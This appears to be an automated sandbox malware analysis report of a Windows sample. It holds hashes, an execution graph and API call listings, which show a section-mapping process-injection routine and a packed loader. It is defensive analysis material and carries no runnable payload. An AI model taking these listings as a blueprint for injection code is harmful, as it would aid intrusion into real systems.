                                                                                                                                                                      • Instruction ID: cd5bf9a1536d6c1099199c8f9cc28ab0899e7841a83666632dd25fee47c7e986
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cec0aee256c75549f2f62a88bbc472755457b35f513753e4aad3764dae2eef7
                                                                                                                                                                      • Instruction Fuzzy Hash: 16416BA281C3C19FE3235F3484922A97FA4EE13311B1901FBC8C16B1D3D6389A07970B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00551E6E Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0054F000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_54f000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                      • Instruction ID: 5acffeef524c588bd35d820e77d0306909c30c762906a28feeac6388bef4f77f
                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                      • Instruction Fuzzy Hash: CB11A072340500AFDB40DE55DC92FA67BEAFB88320B298156ED08CB301E675EC01C764
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1f0000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction ID: 18b0937c7094d01387679a2d538655795a074fdf224cf4a32e7149cc8dc36562
                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 7701DB766016088FDF22CFA4C914BBA33F5FB99316F4944B5DA0AD7243E774A941CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004023E5 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                      • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
                                                                                                                                                                      • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                      • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004026A0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                      • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
                                                                                                                                                                      • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                      • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004221EB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432518633.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_413000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction ID: 2832a0796618cb4f6f256ea13b1b206b47b28915197736d1bd9fbe6573138a96
                                                                                                                                                                      • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction Fuzzy Hash: 15116D3214015EFBCF165E84ED01CEE3F22BB19354B998456FE1869131C37BC9B2AB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.6%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:20.3%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:158
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 7915 421641 7916 421665 __floor_default __ctrlfp 7915->7916 7917 423d44 __except1 RaiseException 7916->7917 7918 4216b6 __floor_default __ctrlfp 7916->7918 7917->7918 7784 421447 7785 421453 7784->7785 7786 421490 7785->7786 7787 42146e GetClassLongW 7785->7787 7787->7785 7919 402e07 7920 402e1a 7919->7920 7921 40193e 11 API calls 7920->7921 7922 402f54 7920->7922 7921->7922 7788 40194a 7789 40194f 7788->7789 7790 401991 Sleep 7789->7790 7791 4019ac 7790->7791 7792 401553 10 API calls 7791->7792 7793 4019bd 7791->7793 7792->7793 7942 7affb0 7943 7affc1 7942->7943 7944 7b0761 3 API calls 7943->7944 7945 7affd9 7944->7945 7923 423e0e 7924 423e44 __handle_exc 7923->7924 7925 423661 __raise_exc_ex RaiseException 7924->7925 7926 423e7a __except1 __umatherr __ctrlfp 7924->7926 7925->7926 7872 4225d1 IsProcessorFeaturePresent 7800 401561 7801 401570 7800->7801 7802 401608 NtDuplicateObject 7801->7802 7811 4018dd 7801->7811 7803 401625 NtCreateSection 7802->7803 7802->7811 7804 4016a5 NtCreateSection 7803->7804 7805 40164b NtMapViewOfSection 7803->7805 7807 4016d1 7804->7807 7804->7811 7805->7804 7806 40166e NtMapViewOfSection 7805->7806 7806->7804 7808 40168c 7806->7808 7809 4016db NtMapViewOfSection 7807->7809 7807->7811 7808->7804 7810 401702 NtMapViewOfSection 7809->7810 7809->7811 7810->7811 7812 401724 7810->7812 7812->7811 7813 401729 3 API calls 7812->7813 7813->7811 7814 423960 7817 423661 7814->7817 7818 423688 __raise_exc_ex 7817->7818 7819 42387b RaiseException 7818->7819 7820 423894 7819->7820 7719 1f003c 7720 1f0049 7719->7720 7732 1f0e0f SetErrorMode SetErrorMode 7720->7732 7725 1f0265 7726 1f02ce VirtualProtect 7725->7726 7728 1f030b 7726->7728 7727 1f0439 VirtualFree 7731 1f04be LoadLibraryA 7727->7731 7728->7727 7730 1f08c7 7731->7730 7733 1f0223 7732->7733 7734 1f0d90 7733->7734 7735 1f0dad 7734->7735 7736 1f0dbb GetPEB 7735->7736 7737 1f0238 VirtualAlloc 7735->7737 7736->7737 7737->7725 7873 4225e1 7874 4225fb __floor_default __ctrlfp 7873->7874 7876 42262c __floor_default __ctrlfp 7874->7876 7877 423d44 7874->7877 7878 423d7a __handle_exc 7877->7878 7879 423661 __raise_exc_ex RaiseException 7878->7879 7880 423da1 __except1 __umatherr __ctrlfp 7878->7880 7879->7880 7880->7876 7666 4214b0 7667 4214ba 7666->7667 7670 421060 7667->7670 7671 42106d 7670->7671 7672 421092 GetTickCount SetLastError GetConsoleAliasesW 7671->7672 7678 4210cc 7671->7678 7673 4210b5 7672->7673 7674 421080 7672->7674 7676 4210c8 7673->7676 7677 4210be CreateDirectoryW 7673->7677 7674->7671 7675 42110f 7679 42111c InterlockedIncrement 7675->7679 7680 4211a5 7675->7680 7676->7678 7677->7676 7678->7675 7681 421105 ResetEvent 7678->7681 7685 421140 SetDefaultCommConfigW FreeEnvironmentStringsA GetCurrentDirectoryA EnumDateFormatsExA 7679->7685 7682 4211e5 OpenJobObjectA 7680->7682 7683 4211fb 10 API calls 7680->7683 7699 421303 7680->7699 7681->7678 7682->7683 7683->7699 7687 421180 GetStartupInfoW 7685->7687 7688 421188 7685->7688 7686 421371 7690 42137d 7686->7690 7700 420e80 LoadLibraryA 7686->7700 7687->7688 7688->7680 7689 421191 GetModuleHandleExA 7688->7689 7689->7680 7690->7686 7692 4213d3 7701 4205d0 LoadLibraryW GetProcAddress VirtualProtect 7692->7701 7694 4213d8 7703 420fb0 7694->7703 7696 421441 7696->7696 7697 4213e2 7697->7696 7698 421415 GetProcessWorkingSetSize 7697->7698 7698->7697 7702 4205a0 LocalAlloc 7699->7702 7700->7692 7701->7694 7702->7686 7710 420ef0 7703->7710 7706 421044 7713 420f20 7706->7713 7707 420fe9 FreeEnvironmentStringsW ReadEventLogA CreateNamedPipeA FileTimeToLocalFileTime 7707->7706 7711 420f01 RtlAllocateHeap LoadLibraryA 7710->7711 7712 420f15 7710->7712 7711->7712 7712->7706 7712->7707 7714 420f3b 7713->7714 7718 420f62 7713->7718 7717 420f4d FreeEnvironmentStringsW 7714->7717 7714->7718 7715 420f69 GetServiceKeyNameW 7716 420f93 7715->7716 7716->7697 7717->7714 7718->7715 7718->7716 7861 1f092b GetPEB 7862 1f0972 7861->7862 7738 402eba 7739 402ecc 7738->7739 7741 402f54 7739->7741 7742 40193e 7739->7742 7743 40194f 7742->7743 7744 401991 Sleep 7743->7744 7745 4019ac 7744->7745 7747 4019bd 7745->7747 7748 401553 7745->7748 7747->7741 7749 401563 7748->7749 7750 4018dd 7749->7750 7751 401608 NtDuplicateObject 7749->7751 7750->7747 7751->7750 7752 401625 NtCreateSection 7751->7752 7753 4016a5 NtCreateSection 7752->7753 7754 40164b NtMapViewOfSection 7752->7754 7753->7750 7756 4016d1 7753->7756 7754->7753 7755 40166e NtMapViewOfSection 7754->7755 7755->7753 7757 40168c 7755->7757 7756->7750 7758 4016db NtMapViewOfSection 7756->7758 7757->7753 7758->7750 7759 401702 NtMapViewOfSection 7758->7759 7759->7750 7760 401724 7759->7760 7760->7750 7762 401729 7760->7762 7763 40172b 7762->7763 7768 401724 7762->7768 7764 4016be NtCreateSection 7763->7764 7763->7768 7765 4016d1 7764->7765 7764->7768 7766 4016db NtMapViewOfSection 7765->7766 7765->7768 7767 401702 NtMapViewOfSection 7766->7767 7766->7768 7767->7768 7768->7750 7769 7affc1 7770 7affd0 7769->7770 7773 7b0761 7770->7773 7774 7b077c 7773->7774 7775 7b0785 CreateToolhelp32Snapshot 7774->7775 7776 7b07a1 Module32First 7774->7776 7775->7774 7775->7776 7777 7b07b0 7776->7777 7778 7affd9 7776->7778 7780 7b0420 7777->7780 7781 7b044b 7780->7781 7782 7b0494 7781->7782 7783 7b045c VirtualAlloc 7781->7783 7782->7782 7783->7782 7939 4222be 7940 4222d2 RtlEncodePointer 7939->7940 7941 4222c9 7939->7941 7869 42393d 7870 423661 __raise_exc_ex RaiseException 7869->7870 7871 42395b 7870->7871

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 86 401553-4015b2 call 4011cd 98 4015b4 86->98 99 4015b7-4015bc 86->99 98->99 101 4015c2-4015d3 99->101 102 4018df-4018e7 99->102 105 4015d9-401602 101->105 106 4018dd 101->106 102->99 107 4018ec-40193b call 4011cd 102->107 105->106 115 401608-40161f NtDuplicateObject 105->115 106->107 115->106 117 401625-401649 NtCreateSection 115->117 118 4016a5-4016cb NtCreateSection 117->118 119 40164b-40166c NtMapViewOfSection 117->119 118->106 123 4016d1-4016d5 118->123 119->118 121 40166e-40168a NtMapViewOfSection 119->121 121->118 124 40168c-4016a2 121->124 123->106 126 4016db-4016fc NtMapViewOfSection 123->126 124->118 126->106 128 401702-40171e NtMapViewOfSection 126->128 128->106 131 401724 128->131 131->106 132 401724 call 401729 131->132 132->106
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 133 40156b-4015b2 call 4011cd 145 4015b4 133->145 146 4015b7-4015bc 133->146 145->146 148 4015c2-4015d3 146->148 149 4018df-4018e7 146->149 152 4015d9-401602 148->152 153 4018dd 148->153 149->146 154 4018ec-40193b call 4011cd 149->154 152->153 162 401608-40161f NtDuplicateObject 152->162 153->154 162->153 164 401625-401649 NtCreateSection 162->164 165 4016a5-4016cb NtCreateSection 164->165 166 40164b-40166c NtMapViewOfSection 164->166 165->153 170 4016d1-4016d5 165->170 166->165 168 40166e-40168a NtMapViewOfSection 166->168 168->165 171 40168c-4016a2 168->171 170->153 173 4016db-4016fc NtMapViewOfSection 170->173 171->165 173->153 175 401702-40171e NtMapViewOfSection 173->175 175->153 178 401724 175->178 178->153 179 401724 call 401729 178->179 179->153
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                      • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 180 401561-4015b2 call 4011cd 190 4015b4 180->190 191 4015b7-4015bc 180->191 190->191 193 4015c2-4015d3 191->193 194 4018df-4018e7 191->194 197 4015d9-401602 193->197 198 4018dd 193->198 194->191 199 4018ec-40193b call 4011cd 194->199 197->198 207 401608-40161f NtDuplicateObject 197->207 198->199 207->198 209 401625-401649 NtCreateSection 207->209 210 4016a5-4016cb NtCreateSection 209->210 211 40164b-40166c NtMapViewOfSection 209->211 210->198 215 4016d1-4016d5 210->215 211->210 213 40166e-40168a NtMapViewOfSection 211->213 213->210 216 40168c-4016a2 213->216 215->198 218 4016db-4016fc NtMapViewOfSection 215->218 216->210 218->198 220 401702-40171e NtMapViewOfSection 218->220 220->198 223 401724 220->223 223->198 224 401724 call 401729 223->224 224->198
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                      • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 225 40156f-4015b2 call 4011cd 233 4015b4 225->233 234 4015b7-4015bc 225->234 233->234 236 4015c2-4015d3 234->236 237 4018df-4018e7 234->237 240 4015d9-401602 236->240 241 4018dd 236->241 237->234 242 4018ec-40193b call 4011cd 237->242 240->241 250 401608-40161f NtDuplicateObject 240->250 241->242 250->241 252 401625-401649 NtCreateSection 250->252 253 4016a5-4016cb NtCreateSection 252->253 254 40164b-40166c NtMapViewOfSection 252->254 253->241 258 4016d1-4016d5 253->258 254->253 256 40166e-40168a NtMapViewOfSection 254->256 256->253 259 40168c-4016a2 256->259 258->241 261 4016db-4016fc NtMapViewOfSection 258->261 259->253 261->241 263 401702-40171e NtMapViewOfSection 261->263 263->241 266 401724 263->266 266->241 267 401724 call 401729 266->267 267->241
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 268 401583-4015b2 call 4011cd 277 4015b4 268->277 278 4015b7-4015bc 268->278 277->278 280 4015c2-4015d3 278->280 281 4018df-4018e7 278->281 284 4015d9-401602 280->284 285 4018dd 280->285 281->278 286 4018ec-40193b call 4011cd 281->286 284->285 294 401608-40161f NtDuplicateObject 284->294 285->286 294->285 296 401625-401649 NtCreateSection 294->296 297 4016a5-4016cb NtCreateSection 296->297 298 40164b-40166c NtMapViewOfSection 296->298 297->285 302 4016d1-4016d5 297->302 298->297 300 40166e-40168a NtMapViewOfSection 298->300 300->297 303 40168c-4016a2 300->303 302->285 305 4016db-4016fc NtMapViewOfSection 302->305 303->297 305->285 307 401702-40171e NtMapViewOfSection 305->307 307->285 310 401724 307->310 310->285 311 401724 call 401729 310->311 311->285
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                      • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
